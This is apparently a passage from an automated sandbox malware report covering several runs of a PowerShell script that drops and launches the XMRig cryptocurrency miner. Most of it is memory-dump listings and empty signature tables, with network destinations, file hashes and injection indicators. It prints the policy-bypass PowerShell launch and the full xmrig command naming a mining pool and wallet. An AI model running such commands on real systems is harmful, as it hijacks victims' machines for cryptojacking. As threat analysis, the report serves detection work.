memory/1520-95-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-96-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-97-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-98-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-99-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-100-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-101-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-102-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-103-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-104-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-105-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-106-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-107-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-108-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-109-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-110-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-111-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-112-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-113-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-114-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-115-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-116-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:10
Platform
win11-20240419-en
Max time kernel
1788s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4888 wrote to memory of 2380 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4888 wrote to memory of 2380 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/4888-0-0x00007FFA7DA33000-0x00007FFA7DA35000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r4cgyxzz.ecm.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4888-9-0x0000027D352F0000-0x0000027D35312000-memory.dmp
memory/4888-10-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp
memory/4888-11-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp
memory/4888-12-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp
memory/4888-13-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp
memory/4888-15-0x0000027D355F0000-0x0000027D35602000-memory.dmp
memory/4888-16-0x0000027D355D0000-0x0000027D355DA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2380-47-0x000002EB2F3E0000-0x000002EB2F400000-memory.dmp
memory/2380-48-0x000002EB2F420000-0x000002EB2F440000-memory.dmp
memory/2380-49-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/4888-50-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp
memory/4888-51-0x00007FFA7DA33000-0x00007FFA7DA35000-memory.dmp
memory/2380-52-0x000002EB2F440000-0x000002EB2F460000-memory.dmp
memory/2380-53-0x000002EB30D10000-0x000002EB30D30000-memory.dmp
memory/2380-54-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-55-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-56-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-58-0x000002EB30D10000-0x000002EB30D30000-memory.dmp
memory/2380-57-0x000002EB2F440000-0x000002EB2F460000-memory.dmp
memory/2380-59-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-60-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-61-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-62-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-63-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-64-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-65-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-66-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-67-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-68-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-69-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-70-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-71-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-72-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-73-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-74-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-75-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-76-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-77-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-78-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-79-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-80-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-81-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-82-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-83-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-84-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-85-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-86-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-87-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-88-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-89-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-90-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-91-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-92-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-93-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-94-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-95-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-96-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-97-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-98-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-99-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-100-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-101-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-102-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-103-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-104-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-105-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-106-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-107-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-108-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-109-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-110-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-111-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-112-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-113-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-114-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-115-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-116-0x00007FF748910000-0x00007FF749543000-memory.dmp
memory/2380-117-0x00007FF748910000-0x00007FF749543000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:11
Platform
win10v2004-20240611-en
Max time kernel
1795s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4600 wrote to memory of 400 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4600 wrote to memory of 400 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=2816,i,6522675234395427298,2952738987384583032,262144 --variations-seed-version --mojo-platform-channel-handle=2312 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4328,i,6522675234395427298,2952738987384583032,262144 --variations-seed-version --mojo-platform-channel-handle=2304 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.234.34.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.12.20.2.in-addr.arpa | udp |
| US | 199.232.210.172:80 | tcp | |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/4600-0-0x00007FFD40393000-0x00007FFD40395000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mdpiugzi.bpn.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4600-6-0x00000231C4F40000-0x00000231C4F62000-memory.dmp
memory/4600-11-0x00007FFD40390000-0x00007FFD40E51000-memory.dmp
memory/4600-12-0x00007FFD40390000-0x00007FFD40E51000-memory.dmp
memory/4600-14-0x00007FFD40390000-0x00007FFD40E51000-memory.dmp
memory/4600-15-0x00000231C5420000-0x00000231C5432000-memory.dmp
memory/4600-16-0x00000231C51F0000-0x00000231C51FA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/400-47-0x000001960C810000-0x000001960C830000-memory.dmp
memory/400-48-0x000001960E010000-0x000001960E030000-memory.dmp
memory/400-49-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-52-0x000001960E030000-0x000001960E050000-memory.dmp
memory/400-53-0x000001960E050000-0x000001960E070000-memory.dmp
memory/4600-51-0x00007FFD40393000-0x00007FFD40395000-memory.dmp
memory/400-50-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/4600-54-0x00007FFD40390000-0x00007FFD40E51000-memory.dmp
memory/400-55-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-56-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-57-0x000001960E030000-0x000001960E050000-memory.dmp
memory/400-58-0x000001960E050000-0x000001960E070000-memory.dmp
memory/400-59-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-60-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-61-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-62-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-63-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-64-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-65-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-66-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-67-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-68-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-69-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-70-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-71-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-72-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-73-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-74-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-75-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-76-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-77-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-78-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-79-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-80-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-81-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-82-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-83-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-84-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-85-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-86-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-87-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-88-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-89-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-90-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-91-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-92-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-93-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-94-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-95-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-96-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-97-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-98-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-99-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-100-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-101-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-102-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-103-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-104-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-105-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-106-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-107-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-108-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-109-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-110-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-111-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-112-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-113-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-114-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-115-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-116-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
memory/400-117-0x00007FF778DB0000-0x00007FF7799E3000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:00
Platform
win10-20240611-en
Max time kernel
1796s
Max time network
1785s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
